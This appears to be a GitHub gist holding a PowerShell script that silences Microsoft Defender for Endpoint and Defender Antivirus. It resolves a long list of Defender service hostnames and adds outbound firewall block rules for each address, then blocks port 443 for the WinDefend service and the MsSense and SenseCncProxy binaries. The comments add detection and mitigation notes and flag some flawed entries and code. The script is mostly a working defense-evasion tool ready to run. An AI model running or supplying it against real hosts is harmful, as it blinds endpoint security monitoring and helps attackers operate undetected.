@ricardojba
Last active August 12, 2024 16:19
Block All Windows Defender/ATP Comms via FW (Privileged)
# https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-proxy-internet?view=o365-worldwide#enable-access-to-microsoft-defender-atp-service-urls-in-the-proxy-server
# https://download.microsoft.com/download/6/b/f/6bfff670-47c3-4e45-b01b-64a2610eaefa/mde-urls-commercial.xlsx
# https://download.microsoft.com/download/6/a/0/6a041da5-c43b-4f17-8167-79dfdc10507f/mde-urls-gov.xlsx
# Purpose: build a denylist of Microsoft Defender for Endpoint (MDE/ATP) and Defender AV
# service FQDNs (taken from the Microsoft URL lists linked above) and cut the local host off
# from them with outbound Windows Firewall Block rules. If it succeeds, the MsSense sensor and
# the WinDefend service lose their cloud path (telemetry, alerting, cloud lookups).
# Requires local administrator rights for New-NetFirewallRule; nothing here elevates.
#
# Detection / mitigation notes (defender's view):
#  - Every New-NetFirewallRule call below is an auditable configuration change: it appears in
#    the Windows Firewall With Advanced Security operational log and, with firewall rule-change
#    auditing enabled, as Security event 4946 (rule added). A burst of outbound Block rules all
#    carrying the DisplayName "Block Microsoft Defender ATP" is a high-fidelity indicator.
#  - Once MsSense can no longer reach its winatp-gw-* endpoints the device should show up in the
#    MDE portal as having stale/no sensor data — alert on that state change (confirm against
#    your tenant's sensor-health reporting).
#  - Centrally managed firewall policy with "Apply local firewall rules" disabled causes rules
#    added locally like these to be ignored; restricting local admin removes the prerequisite.
#
# Hostnames to resolve and block. As written the list contains a duplicate
# "blob.core.windows.net " (trailing space) and several bare labels with no domain
# (e.g. "automatedirstrprdcus", "winatp-gw-cus") that only resolve if a DNS suffix search
# list happens to apply; names that do not resolve make GetHostAddresses below raise an error.
$MSATPURLs = "automatedirstrffusgt.blob.core.usgovcloudapi.net", "automatedirstrffusgv.blob.core.usgovcloudapi.net", "automatedirstrfmusmt.blob.core.usgovcloudapi.net", "automatedirstrfmusmv.blob.core.usgovcloudapi.net", "automatedirstrprdcus", "automatedirstrprdcus.blob.core.windows.net", "automatedirstrprdcus3.blob.core.windows.net", "automatedirstrprdeus.blob.core.windows.net", "automatedirstrprdeus3.blob.core.windows.net", "automatedirstrprdneu.blob.core.windows.net", "automatedirstrprdneu3.blob.core.windows.net", "automatedirstrprduks.blob.core.windows.net", "automatedirstrprdukw.blob.core.windows.net", "automatedirstrprdweu.blob.core.windows.net", "automatedirstrprdweu3.blob.core.windows.net", "blob.core.usgovcloudapi.net", "blob.core.windows.net ", "blob.core.windows.net", "cdn.x.cp.wd.microsoft.com", "checkappexec.microsoft.com", "cloudsink.net", "crl.microsoft.com", "ctldl.windowsupdate.com", "definitionupdates.microsoft.com", "delivery.mp.microsoft.com", "dm.microsoft.com", "download.microsoft.com", "download.windowsupdate.com", "endpoint.security.microsoft.com", "enterpriseregistration.windows.net", "eu-v20.events.data.microsoft.com", "eu.vortex-win.data.microsoft.com", "europe.x.cp.wd.microsoft.com", "events.data.microsoft.com", "fe3cr.delivery.mp.microsoft.com", "go.microsoft.com", "login.live.com", "login.microsoftonline.com", "login.windows.net", "microsoftonline-p.com", "msdl.microsoft.com", "ods.opinsights.azure.com", "ods.opinsights.azure.us", "officecdn-microsoft-com.akamaized.net", "oms.opinsights.azure.com", "oms.opinsights.azure.us", "onboardingpackagescusprd.blob.core.windows.net", "packages.microsoft.com", "psapp.microsoft.com", "psappeu.microsoft.com", "secure.aadcdn.microsoftonline-p.com", "security.microsoft.com", "securitycenter.windows.com", "settings-win.data.microsoft.com", "smartscreen-prod.microsoft.com", "smartscreen.microsoft.com", "static2.sharepointonline.com", "uk-v20.events.data.microsoft.com", 
"uk.vortex-win.data.microsoft.com", "unitedkingdom.x.cp.wd.microsoft.com", "unitedstates.x.cp.wd.microsoft.com", "unitedstates1.cp.wd.microsoft.us", "unitedstates1.ss.wd.microsoft.us", "unitedstates1.x.cp.wd.microsoft.us", "unitedstates2.cp.wd.microsoft.us", "unitedstates2.ss.wd.microsoft.us", "unitedstates2.x.cp.wd.microsoft.us", "unitedstates4.cp.wd.microsoft.us", "unitedstates4.ss.wd.microsoft.us", "unitedstates4.x.cp.wd.microsoft.us", "update.microsoft.com", "urs.microsoft.com", "us-v20.events.data.microsoft.com", "us.vortex-win.data.microsoft.com", "us4-v20.events.data.microsoft.com", "usseu1northprod.blob.core.windows.net", "usseu1westprod.blob.core.windows.net", "ussuk1southprod.blob.core.windows.net", "ussuk1westprod.blob.core.windows.net", "ussus1eastprod.blob.core.windows.net", "ussus1westprod.blob.core.windows.net", "ussus2eastprod.blob.core.windows.net", "ussus2westprod.blob.core.windows.net", "ussus3eastprod.blob.core.windows.net", "ussus3westprod.blob.core.windows.net", "ussus4eastprod.blob.core.windows.net", "ussus4westprod.blob.core.windows.net", "ussusd1centralff5.blob.core.usgovcloudapi.net", "ussusd1eastff5.blob.core.usgovcloudapi.net", "ussusd2centralff5.blob.core.usgovcloudapi.net", "ussusd2eastff5.blob.core.usgovcloudapi.net", "ussusg1texasff0.blob.core.usgovcloudapi.net", "ussusg1texasff4.blob.core.usgovcloudapi.net", "ussusg1virginiaff0.blob.core.usgovcloudapi.net", "ussusg1virginiaff4.blob.core.usgovcloudapi.net", "ussusg2texasff0.blob.core.usgovcloudapi.net", "ussusg2texasff4.blob.core.usgovcloudapi.net", "ussusg2virginiaff0.blob.core.usgovcloudapi.net", "ussusg2virginiaff4.blob.core.usgovcloudapi.net", "vortex-win.data.microsoft.com", "wd.microsoft.com", "wdcp.microsoft.com", "wdcpalt.microsoft.com", "winatp-gw-cus", "winatp-gw-cus.microsoft.com", "winatp-gw-cus3.microsoft.com", "winatp-gw-eus.microsoft.com", "winatp-gw-eus3.microsoft.com", "winatp-gw-neu.microsoft.com", "winatp-gw-neu3.microsoft.com", "winatp-gw-uks.microsoft.com", 
"winatp-gw-ukw.microsoft.com", "winatp-gw-usgt.microsoft.com", "winatp-gw-usgv.microsoft.com", "winatp-gw-usmt.microsoft.com", "winatp-gw-usmv.microsoft.com", "winatp-gw-weu.microsoft.com", "winatp-gw-weu3.microsoft.com", "windowsupdate.com", "wns.windows.com", "wseu1northprod.blob.core.windows.net", "wseu1westprod.blob.core.windows.net", "wsuk1southprod.blob.core.windows.net", "wsuk1westprod.blob.core.windows.net", "wsus1eastprod.blob.core.windows.net", "wsus1westprod.blob.core.windows.net", "wsus2eastprod.blob.core.windows.net", "wsus2westprod.blob.core.windows.net", "wsusd1centralff5.blob.core.usgovcloudapi.net", "wsusd1eastff5.blob.core.usgovcloudapi.net", "wsusg1texasff0.blob.core.usgovcloudapi.net", "wsusg1texasff4.blob.core.usgovcloudapi.net", "wsusg1virginiaff0.blob.core.usgovcloudapi.net", "wsusg1virginiaff4.blob.core.usgovcloudapi.net", "www.microsoft.com", "x.cp.wd.microsoft.com"
# Stand-alone attribute with no param() block after it: it has no effect on this script and,
# depending on the PowerShell version, may be rejected by the parser — TODO confirm.
[CmdletBinding()]
# Snapshot of running process names (Get-Process output reduced to the ProcessName property).
$processnames = Get-process | Select-Object ProcessName
Foreach ($ps in $processnames) {
# The per-FQDN resolve-and-block pass only runs when the MDE sensor process (MsSense*) is present.
if ($ps.ProcessName -like "*MsSense*") {
Write-Output ("[*] Defender ATP process " + $ps.ProcessName + " is running. Resolving ATP FQDN IP's and blocking them.")
# For each hostname: resolve it to its address strings, then create one outbound TCP Block rule
# per address. $_ is rebound twice — the hostname in the outer Foreach, the IP string in the
# inner Foreach-Object. Despite its name, $MSATPCloudIPs collects what the script blocks emit,
# i.e. the rule objects returned by New-NetFirewallRule (Write-Host output is not captured).
# Every rule shares the same DisplayName, so the count of rules with that name equals the
# number of addresses resolved at run time.
$MSATPCloudIPs = ($MSATPURLs | Foreach {[System.Net.Dns]::GetHostAddresses($_) | Select-Object -ExpandProperty IPAddressToString | Foreach-Object {
New-NetFirewallRule -DisplayName "Block Microsoft Defender ATP" -Enabled True -Action Block -LocalPort Any -Protocol TCP -Direction Outbound -RemoteAddress "$_"
# $? reports whether the New-NetFirewallRule call on the previous line succeeded.
Write-Host "$_ - Outbound Firewall Block Was Added: $?"
}})
}
}
# These three rules are created unconditionally (outside the MsSense check) and, unlike the
# per-IP rules above, carry a fixed -Name, so those exact names are what show up in firewall
# logs. They block only TCP/443: the first by service (WinDefend, the AV engine), the other two
# by program path for the MDE sensor binaries. Only the first passes -Enabled explicitly; the
# other two rely on the cmdlet's default. %ProgramFiles% is passed literally in the -Program
# string; expansion is presumably left to the firewall service — confirm.
New-NetFirewallRule -DisplayName "Block 443 MsMpEng" -Name "Block 443 MsMpEng" -Direction Outbound -Service WinDefend -Enabled True -RemotePort 443 -Protocol TCP -Action Block
New-NetFirewallRule -DisplayName "Block 443 SenseCncProxy" -Name "Block 443 SenseCncProxy" -Direction Outbound -Program "%ProgramFiles%\Windows Defender Advanced Threat Protection\SenseCncProxy.exe" -RemotePort 443 -Protocol TCP -Action Block
New-NetFirewallRule -DisplayName "Block 443 MsSense" -Name "Block 443 MsSense" -Direction Outbound -Program "%ProgramFiles%\Windows Defender Advanced Threat Protection\MsSense.exe" -RemotePort 443 -Protocol TCP -Action Block